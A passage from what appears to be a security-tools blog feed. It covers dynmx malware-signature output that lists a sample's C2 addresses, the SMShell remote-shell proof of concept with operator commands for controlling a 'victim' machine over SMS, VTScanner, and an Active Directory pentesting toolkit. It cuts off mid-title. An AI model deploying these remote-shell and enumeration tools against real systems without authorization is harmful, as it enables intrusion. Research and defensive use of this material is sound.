<div><pre><code>$ python3 dynmx.py -f detail detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml<br /><br /><br /> |<br /> __| _ _ _ _ _<br /> / | | | / |/ | / |/ |/ | /\/<br /> \_/|_/ \_/|/ | |_/ | | |_/ /\_/<br /> /|<br /> \|<br /> <br /> Ver. 0.5 (PoC), by 0x534a<br /><br /><br />[+] Parsing 1 function log(s)<br />[+] Loaded 1 dynmx signature(s)<br />[+] Starting detection process with 1 worker(s). This probably takes some time...<br /><br />[+] Result<br />Function log: c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt<br /> Signature: process_hollow<br /> Process: 51f0.exe (PID: 3768)<br /> Number of Findings: 1<br /> Finding 0<br /> proc_hollow : API Call CreateProcessA (Function log line 20560, index 938)<br /> proc_hollow : API Call VirtualAllocEx (Function log line 20566, index 944)<br /> proc_hollow : API Call WriteProcessMemory (Function log line 20573, index 951)<br /> proc_hollow : API Call SetThreadContext (Function log line 20574, index 952)<br /> proc_hollow : API Call ResumeThread (Function log line 20575, index 953)<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Resources</h3> <p dir="auto">In order to extract the accessed OS resources from a function log, we can simply run the <em>dynmx</em> command <code>resources</code> against the function log. An example of the detailed output is shown below for the sample with the SHA-256 hash sum <code>601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9</code>. This is a CAPE sandbox report which is part of the <a href="https://github.com/avast/avast-ctu-cape-dataset" rel="nofollow" target="_blank" title="Avast-CTU Public CAPEv2 Dataset">Avast-CTU Public CAPEv2 Dataset</a>.</p> <div><pre><code>$ python3 dynmx.py -f detail resources --input 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json<br /><br /><br /> |<br /> __| _ _ _ _ _<br /> / | | | / |/ | / |/ |/ | /\/<br /> \_/|_/ \_/|/ | |_/ | | |_/ /\_/<br /> /|<br /> \|<br /><br /> Ver. 0.5 (PoC), by 0x534a<br /><br /><br />[+] Parsing 1 function log(s)<br />[+] Processing function log(s) with the command 'resources'...<br /><br />[+] Result<br />Function log: 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json (/Users/sijansen/Documents/dev/dynmx_flogs/cape/Public_Avast_CTU_CAPEv2_Dataset_Full/extracted/601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json)<br /> Process: 601941F00B194587C9E5.exe (PID: 2008)<br /> Filesystem:<br /> C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)<br /> API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)<br /> C:\Windows\SysWOW64\ntdll.dll (READ)<br /> USER32.dll (EXECUTE)<br /> KERNEL32. dll (EXECUTE)<br /> C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)<br /> Registry:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)<br /> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)<br /> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)<br /> Process: 601941F00B194587C9E5.exe (PID: 1800)<br /> Filesystem:<br /> C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)<br /> API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)<br /> C:\Windows\SysWOW64\ntdll.dll (READ)<br /> USER32.dll (EXECUTE)<br /> KERNEL32.dll (EXECUTE)<br /> [...]<br /> C:\Users\comp\AppData\Local\vscmouse (READ)<br /> C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe:Zone.Identifier (DELETE)<br /> Registry:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)<br /> [...]<br /> Process: vscmouse.exe (PID: 900)<br /> Filesystem:<br /> C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)<br /> API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)<br /> C:\Windows\SysWOW64\ntdll.dll (READ)<br /> USER32.dll (EXECUTE)<br /> KERNEL32.dll (EXECUTE)<br /> C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)<br /> Registry:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C urrentVersion\Setup (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)<br /> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)<br /> HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)<br /> Process: vscmouse.exe (PID: 3036)<br /> Filesystem:<br /> C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)<br /> API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)<br /> C:\Windows\SysWOW64\ntdll.dll (READ)<br /> USER32.dll (EXECUTE)<br /> KERNEL32.dll (EXECUTE)<br /> C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)<br /> C:\ (READ)<br /> C:\Windows\System32\uxtheme.dll (EXECUTE)<br /> dwmapi.dll (EXECUTE)<br /> advapi32.dll (EXECUTE)<br /> shell32.dll (EXECUTE)<br /> C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe (CREATE,READ)<br /> C:\Users\comp\AppData\Local\iproppass\iproppass.exe (DELETE)<br /> crypt32.dll (EXECUTE)<br /> urlmon.dll (EXECUTE)<br /> userenv.dll (EXECUTE)<br /> wininet.dll (EXECUTE)<br /> wtsapi32.dll (EXECUTE)<br /> CRYPTSP.dll (EXECUTE)<br /> CRYPTBASE.dll (EXECUTE)<br /> ole32.dll (EXECUTE)<br /> OLEAUT32.dll (EXECUTE)<br /> C:\Windows\SysWOW64\oleaut32.dll (EXECUTE)<br /> IPHLPAPI.DLL (EXECUTE)<br /> DHCPCSVC.DLL (EXECUTE)<br /> C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\ (CREATE)<br /> C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk (CREATE,READ)<br /> Registry:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ )<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)<br /> [...]<br /> Network:<br /> 24.151.31.150:465 (READ)<br /> http://24.151.31.150:465 (READ,WRITE)<br /> 107.10.49.252:80 (READ)<br /> http://107.10.49.252:80 (READ,WRITE)<br /></code></pre></div> <p dir="auto">Based on the shown output and the accessed resources, we can deduce some malware features:</p> <ul dir="auto"> <li>Within the process <code>601941F00B194587C9E5.exe</code> (PID 1800), the Zone Identifier of the file <code>C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe</code> is deleted</li> <li>Some DLLs are loaded dynamically</li> <li>The process <code>vscmouse.exe</code> (PID: 3036) connects to the network endpoints <code>http://24.151.31.150:465</code> and <code>http://107.10.49.252:80</code></li> </ul> <p dir="auto">The accessed resources are interesting for identifying host- and network-based detection indicators. In addition, resources can be used in <em>dynmx</em> signatures. A popular example is the detection of <a href="https://www.kitploit.com/search/label/Persistence" target="_blank" title="persistence">persistence</a> mechanisms in the Registry.</p> <div>Installation <p dir="auto">In order to use the software Python 3.9 must be available on the target system. In addition, the following Python packages need to be installed:</p> <ul dir="auto"> <li><code>anytree</code>,</li> <li><code>lxml</code>,</li> <li><code>pyparsing</code>,</li> <li><code>PyYAML</code>,</li> <li><code>six</code> and</li> <li><code>stringcase</code></li> </ul> <p dir="auto">To install the packages run the <code>pip3</code> command shown below. It is recommended to use a Python virtual environment instead of installing the packages system-wide.</p> <div><pre><code>pip3 install -r requirements.txt<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">To use the prototype, simply run the main entry point <code>dynmx.py</code>. The usage information can be viewed with the <code>-h</code> <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> parameter as shown below.</p> <div><pre><code>$ python3 dynmx.py -h<br />usage: dynmx.py [-h] [--format {overview,detail}] [--show-log] [--log LOG] [--log-level {debug,info,error}] [--worker N] {detect,check,convert,stats,resources} ...<br /><br />Detect dynmx signatures in dynamic program execution information (function logs)<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> --format {overview,detail}, -f {overview,detail}<br /> Output format<br /> --show-log Show all log output on stdout<br /> --log LOG, -l LOG log file<br /> --log-level {debug,info,error}<br /> Log level (default: info)<br /> --worker N, -w N Number of workers to spawn (default: number of processors - 2)<br /><br />sub-commands:<br /> task to perform<br /><br /> {detect,check,convert,stats,resources}<br /> detect Detects a dynmx signature<br /> check Checks the syntax of dynmx signature(s)<br /> convert Converts function logs to the dynmx generic function log format<br /> stats Statistics of function logs<br /> resources Resource activity derived from function log<br /></code></pre></div> <p dir="auto">In general, as shown in the output, several command line parameters regarding the log handling, the output format for results or multiprocessing can be defined. Furthermore, a command needs be chosen to run a specific task. Please note, that the number of workers only affects commands that make use of multiprocessing. Currently, these are the commands <code>detect</code> and <code>convert</code>.</p> <p dir="auto">The commands have specific command line parameters that can be explored by giving the parameter <code>-h</code> to the command, e.g. for the <code>detect</code> command as shown below.</p> <div><pre><code>$ python3 dynmx.py detect -h<br />usage: dynmx.py detect [-h] --sig SIG [SIG ...] --input INPUT [INPUT ...] [--recursive] [--json-result JSON_RESULT] [--runtime-result RUNTIME_RESULT] [--detect-all]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> --recursive, -r Search for input files recursively<br /> --json-result JSON_RESULT<br /> JSON formatted result file<br /> --runtime-result RUNTIME_RESULT<br /> Runtime statistics file formatted in CSV<br /> --detect-all Detect signature in all processes and do not stop after the first detection<br /><br />required arguments:<br /> --sig SIG [SIG ...], -s SIG [SIG ...]<br /> dynmx signature(s) to detect<br /> --input INPUT [INPUT ...], -i INPUT [INPUT ...]<br /> Input files<br /></code></pre></div> <p dir="auto">As a user of <em>dynmx</em>, you can decide how the output is structured. If you choose to show the log on the console by defining the parameter <code>--show-log</code>, the output consists of two sections (see listing below). The log is shown first and afterwards the results of the used command. By default, the log is neither shown in the console nor written to a log file (which can be defined using the <code>--log</code> parameter). Due to multiprocessing, the entries in the log file are not necessarily in chronological order.</p> <div><pre><code><br /><br /> |<br /> __| _ _ _ _ _<br /> / | | | / |/ | / |/ |/ | /\/<br /> \_/|_/ \_/|/ | |_/ | | |_/ /\_/<br /> /|<br /> \|<br /> <br /> Ver. 0.5 (PoC), by 0x534a<br /><br /><br />[+] Log output<br />2023-06-27 19:07:38,068+0000 [INFO] (__main__) [PID: 13315] []: Start of dynmx run<br />[...]<br />[+] End of log output<br /><br />[+] Result<br />[...]<br /></code></pre></div> <p dir="auto">The level of detail of the result output can be defined using the command line parameter <code>--output-format</code> which can be set to <code>overview</code> for a high-level result or to <code>detail</code> for a detailed result. For example, if you define the output format to <code>detail</code>, detection results shown in the console will contain the exact API calls and resources that caused the detection. The overview output format will just indicate what signature was detected in which function log.</p> <h2 dir="auto" tabindex="-1">Example Command Lines</h2> <p dir="auto">Detection of a <em>dynmx</em> signature in a function log with one worker process</p> <div><pre><code>python3 dynmx.py -w 1 detect -i "flog.txt" -s dynmx_signature.yml<br /></code></pre></div> <p dir="auto">Conversion of a function log to the <em>dynmx</em> generic function log format</p> <div><pre><code>python3 dynmx.py convert -i "flog.txt" -o /tmp/<br /></code></pre></div> <p dir="auto">Check a signature (only basic sanity checks)</p> <div><pre><code>python3 dynmx.py check -s dynmx_signature.yml<br /></code></pre></div> <p dir="auto">Get a detailed list of used resources used by a malware sample based on the function log (access activity model)</p> <div><pre><code>python3 dynmx.py -f detail resources -i "flog.txt"<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Troubleshooting</h2> <p dir="auto">Please consider that this tool is a proof-of-concept which was developed besides writing the master thesis. Hence, the <a href="https://www.kitploit.com/search/label/Code%20Quality" target="_blank" title="code quality">code quality</a> is not always the best and there may be bugs and errors. I tried to make the tool as robust as possible in the given time frame.</p> <p dir="auto">The best way to troubleshoot errors is to enable logging (on the console and/or to a log file) and set the log level to <code>debug</code>. Exception handlers should write detailed errors to the log which can help troubleshooting.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/0x534a/dynmx" rel="nofollow" target="_blank" title="Download Dynmx">Download Dynmx</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-75848228572884862862023-09-19T08:30:00.001-03:002023-09-19T08:30:00.178-03:00SMShell - Send Commands And Receive Responses Over SMS From Mobile Broadband Capable Computers<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUP2kJiHpHSz8be_u-LNqVXu1RRbGJRLtKGpYI-wG-X7DizrCzsSpJIIkx4rn1bTz0Vp86FiFywTSXu2JB5-TjXl2lsMmq3eeieOY9QLCDm0Q3Hy3i_gyl59yDID1eJJy-eQi1IO5A8XLvSDOl5WKtc7dsCGvCc4fwgbQRhxPc27rZssY2awnp0xnKfWY/s1585/SMShell_1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="835" data-original-width="1585" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUP2kJiHpHSz8be_u-LNqVXu1RRbGJRLtKGpYI-wG-X7DizrCzsSpJIIkx4rn1bTz0Vp86FiFywTSXu2JB5-TjXl2lsMmq3eeieOY9QLCDm0Q3Hy3i_gyl59yDID1eJJy-eQi1IO5A8XLvSDOl5WKtc7dsCGvCc4fwgbQRhxPc27rZssY2awnp0xnKfWY/w640-h338/SMShell_1.gif" width="640" /></a></div><div><br /></div> <p dir="auto">PoC for an SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers.</p> <p dir="auto">This tool came as an insipiration during a <a href="https://www.kitploit.com/search/label/Research" target="_blank" title="research">research</a> on eSIM security implications led by Markus Vervier, presented at <a href="https://www.offensivecon.org/speakers/2023/markus-vervier.html" rel="nofollow" target="_blank" title="Offensivecon 2023">Offensivecon 2023</a></p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto" tabindex="-1">Disclaimer</h1> <p dir="auto">This is not a complete C2 but rather a simple Proof of Concept for executing commands remotely over SMS.</p> <h1 dir="auto" tabindex="-1">Requirements</h1> <p dir="auto">For the shell to work you need to devices capable of sending SMS. The victim's computer should be equiped with WWAN module with either a physical SIM or eSIM deployed.</p> <p dir="auto">On the operator's end, two tools are provided:</p> <ul dir="auto"> <li>.NET <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> which uses an <a href="https://www.kitploit.com/search/label/Embedded" target="_blank" title="embedded">embedded</a> WWAN module</li> <li>Python script which uses an external Huaweu MiFi thourgh its API</li> </ul> <p dir="auto">Of course, you could in theory use any online SMS provider on the operator's end via their API.</p> <h1 dir="auto" tabindex="-1">Usage</h1> <p dir="auto">On the victim simply execute the <code>client-agent.exe</code> binary. If the agent is compiled as a <code>Console Application</code> you should see some verbose messages. If it's compiled as a <code>Windows Application</code> (best for real engagements), there will be no GUI.</p> <p dir="auto">The operator must specify the victim's <a href="https://www.kitploit.com/search/label/Phone%20Number" target="_blank" title="phone number">phone number</a> as a parameter:</p> <div><pre><code>server-console.exe +306912345678<br /></code></pre></div> <p dir="auto">Whereas if you use the python script you must additionally specify the MiFi details:</p> <div><pre><code>python3 server-console.py --mifi-ip 192.168.0.1 --mifi-username admin --mifi-password 12345678 --number +306912345678 -v<br /></code></pre></div> <p dir="auto">A demo as presented by Markus at Offensive is shown below. On the left is the operator's VM with a MiFi attached, whereas on the right window is client agent.</p><p dir="auto"><br /></p><p dir="auto" style="text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUP2kJiHpHSz8be_u-LNqVXu1RRbGJRLtKGpYI-wG-X7DizrCzsSpJIIkx4rn1bTz0Vp86FiFywTSXu2JB5-TjXl2lsMmq3eeieOY9QLCDm0Q3Hy3i_gyl59yDID1eJJy-eQi1IO5A8XLvSDOl5WKtc7dsCGvCc4fwgbQRhxPc27rZssY2awnp0xnKfWY/s1585/SMShell_1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="835" data-original-width="1585" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUP2kJiHpHSz8be_u-LNqVXu1RRbGJRLtKGpYI-wG-X7DizrCzsSpJIIkx4rn1bTz0Vp86FiFywTSXu2JB5-TjXl2lsMmq3eeieOY9QLCDm0Q3Hy3i_gyl59yDID1eJJy-eQi1IO5A8XLvSDOl5WKtc7dsCGvCc4fwgbQRhxPc27rZssY2awnp0xnKfWY/w640-h338/SMShell_1.gif" width="640" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/persistent-security/SMShell" rel="nofollow" target="_blank" title="Download SMShell">Download SMShell</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-66521425519389685242023-09-12T08:30:00.001-03:002023-09-12T08:30:00.142-03:00VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIRgOpMXPL80PBTZ2O22sWdg-EYxdHhOhl4n1K9srd07zMTGGS0z6o6HF83FH8UYJmt_Z-J66Y4jANVC_5LC8TYdbSO1U1ay_PZuVC96Ow2VNc5bMt7Iva5HPw8Xcu5hCpl5TXtLP_TSmZxQjxHD9mVZILHhWMj2G-IkQn44tfeXYhtxiStMXRvdKdbWsZ"><img alt="" border="0" height="364" id="BLOGGER_PHOTO_ID_7276633524747992834" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIRgOpMXPL80PBTZ2O22sWdg-EYxdHhOhl4n1K9srd07zMTGGS0z6o6HF83FH8UYJmt_Z-J66Y4jANVC_5LC8TYdbSO1U1ay_PZuVC96Ow2VNc5bMt7Iva5HPw8Xcu5hCpl5TXtLP_TSmZxQjxHD9mVZILHhWMj2G-IkQn44tfeXYhtxiStMXRvdKdbWsZ=w640-h364" width="640" /></a></div><div><br /></div> <p dir="auto">VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> for <a href="https://www.kitploit.com/search/label/Malware%20Detection" target="_blank" title="malware detection">malware detection</a> and analysis. It seamlessly integrates with the <a href="https://www.kitploit.com/search/label/VirusTotal" target="_blank" title="VirusTotal">VirusTotal</a> API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Features</h2> <h3 dir="auto" tabindex="-1">1. Directory-Based Scanning</h3> <p dir="auto">VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.</p> <h3 dir="auto" tabindex="-1">2. Detailed Scan Reports</h3> <p dir="auto">Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.</p> <h3 dir="auto" tabindex="-1">3. Hash-Based Checks</h3> <p dir="auto">VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.</p> <h3 dir="auto" tabindex="-1">4. VirusTotal Integration</h3> <p dir="auto">VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.</p> <h3 dir="auto" tabindex="-1">5. Time Delay Functionality</h3> <p dir="auto">For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring <a href="https://www.kitploit.com/search/label/Compliance" target="_blank" title="compliance">compliance</a> with VirusTotal's rate limits.</p> <h3 dir="auto" tabindex="-1">6. Premium API Support</h3> <p dir="auto">If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.</p> <h3 dir="auto" tabindex="-1">7. Interactive VirusTotal Exploration</h3> <p dir="auto">VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.</p> <h3 dir="auto" tabindex="-1">8. Preinstalled Windows Binaries</h3> <p dir="auto">For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 <a href="https://www.kitploit.com/search/label/Antivirus" target="_blank" title="antivirus">antivirus</a> scanners.</p> <h3 dir="auto" tabindex="-1">9. Custom Binary Generation</h3> <p dir="auto">If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <h3 dir="auto" tabindex="-1">Prerequisites</h3> <p dir="auto">Before installing VTScanner, make sure you have the following prerequisites in place:</p> <ul dir="auto"> <li>Python 3.6 installed on your system.</li> </ul> <div><pre><code>pip install -r requirements.txt</code></pre></div> <h3 dir="auto" tabindex="-1">Download VTScanner</h3> <p dir="auto">You can acquire VTScanner by cloning the GitHub repository to your local machine:</p> <div><pre><code>git clone https://github.com/samhaxr/VTScanner.git<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Usage</h3> <p dir="auto">To initiate VTScanner, follow these steps:</p> <div><pre><code>cd VTScanner<br />python3 VTScanner.py<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Configuration</h3> <ul dir="auto"> <li>Set the time delay between scan requests.</li> <li>Enter your VirusTotal API key in config.ini</li> </ul> <h3 dir="auto" tabindex="-1">License</h3> <p dir="auto">VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.</p> <h3 dir="auto" tabindex="-1">Disclaimer</h3> <p dir="auto">VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/samhaxr/VTScanner" rel="nofollow" target="_blank" title="Download VTScanner">Download VTScanner</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-66344737802191381942023-08-22T08:30:00.001-04:002023-08-22T08:30:00.144-04:00AD_Enumeration_Hunt - Collection Of PowerShell Scripts And Commands That Can Be Used For Active Directory (AD) Penetration Testing And Security Assessment<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIemmmtBAOzO8tO-WNrHIXpd_K2YRr7MqNCHwpRRq7DFcdCbcXERB8GtoJeX2rELvtWfgo0HSJQri_dCJtTB9JwyvqiZ4NlVcFWW2UNY5s1k3rMjUgIABoNo8CwkimaJRTz7gZKpvCeAingo2EwIWJ0xeUnvnyhrUC04AnoXOqVBE2T7jM7w7q0zLXoFr_/s225/AD_Enumeration_Hunt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="225" data-original-width="225" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIemmmtBAOzO8tO-WNrHIXpd_K2YRr7MqNCHwpRRq7DFcdCbcXERB8GtoJeX2rELvtWfgo0HSJQri_dCJtTB9JwyvqiZ4NlVcFWW2UNY5s1k3rMjUgIABoNo8CwkimaJRTz7gZKpvCeAingo2EwIWJ0xeUnvnyhrUC04AnoXOqVBE2T7jM7w7q0zLXoFr_/w400-h400/AD_Enumeration_Hunt.png" width="400" /></a></div><p><br /></p> <h2 dir="auto" tabindex="-1">Description</h2> <p dir="auto">Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> (AD) <a href="https://www.kitploit.com/search/label/Penetration%20Testing" target="_blank" title="penetration testing">penetration testing</a> and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.</p> <p dir="auto">The toolkit is intended for use by penetration testers, red teamers, and security professionals who want to test and assess the security of Active Directory environments. Please ensure that you have proper <a href="https://www.kitploit.com/search/label/Authorization" target="_blank" title="authorization">authorization</a> and permission before using these scripts in any production environment.</p> <p dir="auto">Everyone is looking at what you are looking at; But can everyone see what he can see? You are the only difference between them… By Mevlânâ Celâleddîn-i Rûmî</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Features</h2> <p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/64872731/258566614-456c87fa-8480-4fae-8dfa-1b7288303ace.gif" rel="nofollow" target="_blank" title="$ (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjXIl6KSRfJK0J5neHiEPni0loBd0z_mo2OZgdWfDajTZxz26-pmfiQD41nJ8EuP-2WzAnufSAApb9MeuKE2uwR8ITGnUZqDVNs4gk5AeQBCEFHED7N09HoNwhcb9UivYzotqgq3fBcS0JQS6hMzDfPys4S4iY60FUgiWEWe8THf_WHwkDIJGbzCsNjBW4l"><img alt="" border="0" height="328" id="BLOGGER_PHOTO_ID_7265043511742729218" src="https://blogger.googleusercontent.com/img/a/AVvXsEjXIl6KSRfJK0J5neHiEPni0loBd0z_mo2OZgdWfDajTZxz26-pmfiQD41nJ8EuP-2WzAnufSAApb9MeuKE2uwR8ITGnUZqDVNs4gk5AeQBCEFHED7N09HoNwhcb9UivYzotqgq3fBcS0JQS6hMzDfPys4S4iY60FUgiWEWe8THf_WHwkDIJGbzCsNjBW4l=w640-h328" width="640" /></a></p> <ul dir="auto"> <li>Enumerate and gather information about AD domains, users, groups, and computers.</li> <li>Check trust relationships between domains.</li> <li>List all objects inside a specific Organizational Unit (OU).</li> <li>Retrieve information about the currently logged-in user.</li> <li>Perform various operations related to local users and groups.</li> <li>Configure firewall rules and enable <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="Remote Desktop">Remote Desktop</a> (RDP).</li> <li>Connect to remote machines using RDP.</li> <li>Gather network and security information.</li> <li>Check <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows Defender</a> status and exclusions configured via GPO.</li> <li>...and more!</li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <ol dir="auto"> <li>Clone the repository or download the scripts as needed.</li> <li>Run the PowerShell script using the appropriate PowerShell environment.</li> <li>Follow the on-screen prompts to provide domain, username, and password when required.</li> <li>Enjoy exploring the AD Pentesting Toolkit and use the scripts responsibly!</li> </ol> <h2 dir="auto" tabindex="-1">Disclaimer</h2> <p dir="auto">The AD Pentesting Toolkit is for educational and testing purposes only. The authors and contributors are not responsible for any misuse or damage caused by the use of these scripts. Always ensure that you have proper authorization and permission before performing any penetration testing or security assessment activities on any system or network.</p> <h2 dir="auto" tabindex="-1">License</h2> <p dir="auto">This project is licensed under the <a href="https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/LICENSE" rel="nofollow" target="_blank" title="MIT License">MIT License</a>. The Mewtwo ASCII art is the property of Alperen Ugurlu. All rights reserved.</p> <h2 dir="auto" tabindex="-1">Cyber Security Consultant </h2><p dir="auto"><a href="https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/" rel="nofollow" target="_blank" title="Alperen Ugurlu">Alperen Ugurlu</a></p><p dir="auto"><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/alperenugurlu/AD_Enumeration_Hunt" rel="nofollow" target="_blank" title="Download AD_Enumeration_Hunt">Download AD_Enumeration_Hunt</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-17704117886219203702023-08-15T08:30:00.013-04:002023-08-15T08:30:00.149-04:00Trawler - PowerShell Script To Help Incident Responders Discover Adversary 